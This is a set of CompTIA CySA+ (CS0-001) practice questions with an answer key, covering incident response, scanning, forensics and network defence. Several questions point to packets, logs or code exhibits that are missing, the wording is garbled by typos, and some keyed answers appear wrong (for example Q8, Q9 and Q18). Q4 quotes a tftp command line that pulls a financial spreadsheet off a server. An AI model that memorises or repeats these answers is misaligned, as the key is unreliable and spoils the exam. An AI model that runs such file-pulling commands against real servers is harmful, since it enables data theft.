Pinpoint CS0-001 Samples 2021

NEW QUESTION 1

A corporation employs a number of small-form-factor workstations and mobile devices, and an incident response team is therefore required to build a forensics kit with tools to support chip-off analysis. Which of the following tools would BEST meet this requirement?

• A. JTAG adapters
• B. Last-level cache readers
• C. Write-blockers
• D. ZIF adapters

Answer: A

NEW QUESTION 2

Poky allows scanning of vulnerabilities during production hours. But production servers have been crashing later due lo unauthorized scans performed by junior technicians. Which of the following is the BEST solution to avoid production server downtime due to these types of scans?

• A. Transition from centralized to agent-based scans
• B. Require vulnerability scans be performed by trained personnel.
• C. Configure daily automated detailed vulnerability reports.
• D. Scan only as required to regulatory compliance.
• E. Implement sandboxing to analyze the results of each scan.

Answer: B

NEW QUESTION 3

A common mobile device vulnerability has made unauthorized modifications to a device. The device owner removes the vendor/carrier provided limitations on the mobile device. This is also known as:

• A. jailbreaking.
• B. cracking.
• C. hashing.
• D. fuzzing.

Answer: A

NEW QUESTION 4

Weeks before a proposed merger is scheduled for completion, a security analyst has noticed unusual traffic patterns on a file server that contains financial information. Routine scans are not detecting the signature of any known exploits or malware. The following entry is seen in the ftp server logs:
tftp –I 10.1.1.1 GET fourthquarterreport.xls
Which of the following is the BEST course of action?

• A. Continue to monitor the situation using tools to scan for known exploits.
• B. Implement an ACL on the perimeter firewall to prevent data exfiltration.
• C. Follow the incident response procedure associate with the loss of business critical data.
• D. Determine if any credit card information is contained on the server containing the financials.

Answer: C

NEW QUESTION 5

The development team recently moved a new application into production for the accounting department. After this occurred, the Chief Information Officer (CIO) was contacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporation’s quarterly tax returns. Which of the following types of testing would help prevent this from reoccurring?

• A. Security regression testing
• B. User acceptance testing
• C. Input validation testing
• D. Static code testing

Answer: B

NEW QUESTION 6

Which of the following is vulnerability when using Windows as a host OS lot virtual machines?

• A. Windows requires frequent patching.
• B. Windows virtualized environments are typically unstable.
• C. Windows requires hundreds of open firewall ports lo operate.
• D. Windows is vulnerable to the "ping of death"

Answer: D

NEW QUESTION 7

After reviewing the following packet, a cybersecurity analyst has discovered an unauthorized service is running on a company’s computer.

Which of the following ACLs, if implemented, will prevent further access ONLY to the unauthorized service and will not impact other services?

• A. DENY TCP ANY HOST 10.38.219.20 EQ 3389
• B. DENY IP HOST 10.38.219.20 ANY EQ 25
• C. DENY IP HOST192.168.1.10 HOST 10.38.219.20 EQ 3389
• D. DENY TCP ANY HOST 192.168.1.10 EQ 25

Answer: A

NEW QUESTION 8

A security administrator uses FTK to take an image of a hard drive that is under investigation. Which of the following processes are used to ensure the image is the same as the original disk? (Choose two.)

• A. Validate the folder and file directory listings on both.
• B. Check the hash value between the image and the original.
• C. Boot up the image and the original systems to compare.
• D. Connect a write blocker to the imaging device.
• E. Copy the data to a disk of the same size and manufacturer.

Answer: BC

NEW QUESTION 9

A security analyst begins to notice the CPU utilization from a sinkhole has begun to spike Which of the
following describes what may be occurring?

• A. Someone has logged on to the sinkhole and is using the device
• B. The sinkhole has begun blocking suspect or malicious traffic
• C. The sinkhole has begun rerouting unauthorized traffic
• D. Something is controlling the sinkhole and causing CPU spikes due to malicious utilization.

Answer: C

NEW QUESTION 10

A malware infection spread to numerous workstations within the marketing department. The workstations were quarantined and replaced with machines.
Which of the following represents a FINAL step in the eradication of the malware?

• A. The workstations should be isolated from the network.
• B. The workstations should be donated for reuse.
• C. The workstations should be reimaged.
• D. The workstations should be patched and scanned.

Answer: D

NEW QUESTION 11

A worm was detected on multiple PCs within the remote office. The security analyst recommended that the remote office be blocked from the corporate network during the incident response. Which of the following processes BEST describes this recommendation?

• A. Logical isolation of the remote office
• B. Sanitization of the network environment
• C. Segmentation of the network
• D. Secure disposal of affected systems

Answer: A

NEW QUESTION 12

A security analyst is reviewing the following log after enabling key-based authentication.

Given the above information, which of the following steps should be performed NEXT to secure the system?

• A. Disable anonymous SSH logins.
• B. Disable password authentication for SSH.
• C. Disable SSHv1.
• D. Disable remote root SSH logins.

Answer: B

NEW QUESTION 13

An analyst has initiated an assessment of an organization’s security posture. As a part of this review, the analyst would like to determine how much information about the organization is exposed externally. Which of the following techniques would BEST help the analyst accomplish this goal? (Select two.)

• A. Fingerprinting
• B. DNS query log reviews
• C. Banner grabbing
• D. Internet searches
• E. Intranet portal reviews
• F. Sourcing social network sites
• G. Technical control audits

Answer: DF

NEW QUESTION 14

While preparing for a third-party audit, the vice president of risk management and the vice president of information technology have stipulated that the vendor may not use offensive software during the audit. This is an example of:

• A. organizational control.
• B. service-level agreement.
• C. rules of engagement.
• D. risk appetite.

Answer: C

NEW QUESTION 15

A cybersecurity analyst is retained by a firm for an open investigation. Upon arrival, the cybersecurity analyst reviews several security logs.
Given the following snippet of code:

Which of the following combinations BEST describes the situation and recommendations to be made for this situation?

• A. The cybersecurity analyst has discovered host 192.168.0.101 using Windows Task Scheduler at 13:30 to runnc.exe; recommend proceeding with the next step of removing the host from the network.
• B. The cybersecurity analyst has discovered host 192.168.0.101 to be running thenc.exe file at 13:30 using the auto cron job remotely, there are no recommendations since this is not a threat currently.
• C. The cybersecurity analyst has discovered host 192.168.0.101 is beaconing every day at 13:30 using thenc.exe file; recommend proceeding with the next step of removing the host from the network.
• D. The security analyst has discovered host 192.168.0.101 is a rogue device on the network, recommend proceeding with the next step of removing the host from the network.

Answer: A

NEW QUESTION 16

An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed, and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive?

• A. Reports show the scanner compliance plug-in is out-of-date.
• B. Any items labeled ‘low’ are considered informational only.
• C. The scan result version is different from the automated asset inventory.
• D. ‘HTTPS’ entries indicate the web page is encrypted securely.

Answer: B

NEW QUESTION 17

While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert regarding the same indicator. The threat intelligence analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened in this situation?

• A. The analyst is not using the standard approved browser.
• B. The analyst accidently clicked a link related to the indicator.
• C. The analyst has prefetch enabled on the browser in use.
• D. The alert in unrelated to the analyst’s search.

Answer: C

NEW QUESTION 18

Which of the fallowing has the GREAT EST impact to the data retention policies of an organization?

• A. The CIA classification matrix assigned to each piece of data
• B. The level of sensitivity of the data established by the data owner
• C. The regulatory requirements concerning the data set
• D. The technical constraints of the technology used to store the data

Answer: D

NEW QUESTION 19

Which of the following represent the reasoning behind careful selection of the timelines and time-of-day boundaries for an authorized penetration test? (Select TWO).

• A. To schedule personnel resources required for test activities
• B. To determine frequency of team communication and reporting
• C. To mitigate unintended impacts to operations
• D. To avoid conflicts with real intrusions that may occur
• E. To ensure tests have measurable impact to operations

Answer: AC

NEW QUESTION 20

A security analyst reserved several service tickets reporting that a company storefront website is not accessible
by internal domain users. However, external users ate accessing the website without issue. Which of the following is the MOST likely reason for this behavior?

• A. The FQDN is incorrect.
• B. The DNS server is corrupted.
• C. The time synchronization server is corrupted.
• D. The certificate is expired.

Answer: B

NEW QUESTION 21

While reviewing firewall logs, a security analyst at a military contractor notices a sharp rise in activity from a
foreign domain known to have well-funded groups that specifically target the company’s R&D department. Historical data reveals other corporate assets were previously targeted. This evidence MOST likely describes:

• A. an APT.
• B. DNS harvesting.
• C. a zero-day exploit.
• D. corporate espionage.

Answer: A

NEW QUESTION 22

A cybersecurity analyst is reviewing the following outputs:

Which of the following can the analyst infer from the above output?

• A. The remote host is redirecting port 80 to port 8080.
• B. The remote host is running a service on port 8080.
• C. The remote host’s firewall is dropping packets for port 80.
• D. The remote host is running a web server on port 80.

Answer: B

NEW QUESTION 23

In reviewing firewall logs, a security analyst has discovered the following IP address, which several employees are using frequently:
152.100.57.18
The organization’s servers use IP addresses in the 192.168.0.1/24 CIDR. Additionally, the analyst has noticed that corporate data is being stored at this new location. A few of these employees are on the management and executive management teams. The analyst has also discovered that there is no record of this IP address or service in reviewing the known locations of managing system assets. Which of the following is occurring in this scenario?

• A. Malicious process
• B. Unauthorized change
• C. Data exfiltration
• D. Unauthorized access

Answer: C

NEW QUESTION 24

Management wants to scan servers for vulnerabilities on a periodic basis. Management has decided that the scan frequency should be determined only by vendor patch schedules and the organization’s application deployment schedule. Which of the following would force the organization to conduct an out-of-cycle vulnerability scan?

• A. Newly discovered PII on a server
• B. A vendor releases a critical patch update
• C. A critical bug fix in the organization’s application
• D. False positives identified in production

Answer: B

NEW QUESTION 25

A company has decided to process credit card transactions directly. Which of the following would meet the requirements for scanning this type of data?

• A. Quarterly
• B. Yearly
• C. Bi-annually
• D. Monthly

Answer: A

NEW QUESTION 26

A security analyst wants to scan the network for active hosts. Which of the following host characteristics help to differentiate between a virtual and physical host?

• A. Reserved MACs
• B. Host IPs
• C. DNS routing tables
• D. Gateway settings

Answer: A

NEW QUESTION 27

While reviewing three months of logs, a security analyst notices probes from random company laptops going to SCADA equipment at the company’s manufacturing location. Some of the probes are getting responses from the equipment even though firewall rules are in place, which should block this type of unauthorized activity. Which of the following should the analyst recommend to keep this activity from originating from company laptops?

• A. Implement a group policy on company systems to block access to SCADA networks.
• B. Require connections to the SCADA network to go through a forwarding proxy.
• C. Update the firewall rules to block SCADA network access from those laptop IP addresses.
• D. Install security software and a host-based firewall on the SCADA equipment.

Answer: A

NEW QUESTION 28

Which of the following countermeasures should the security administrate apply to MOST effectively mitigate Rootkit level infections of the organization's workstation devices?

• A. Remove local administrator privileges.
• B. Configure a BIOS-level password on the device.
• C. Install a secondary virus protection application.
• D. Enforce a system state recovery after each device reboot.

Answer: A

NEW QUESTION 29

A penetration tester is preparing for an audit of critical that may impact the security of the environment. The includes the external perimeter and the intermitted of the environment. During which of the following processes is this type information normally gathered?

• A. Timing
• B. Scoping
• C. Authorization
• D. Enumeration

Answer: B

NEW QUESTION 30

A recent audit has uncovered several coding errors and a lack of input validation being used on a public portal. Due to the nature of the portal and the severity of the errors, the portal is unable to be patched. Which of the following tools could be used to reduce the risk of being compromised?

• A. Web application firewall
• B. Network firewall
• C. Web proxy
• D. Intrusion prevention system

Answer: A

NEW QUESTION 31
......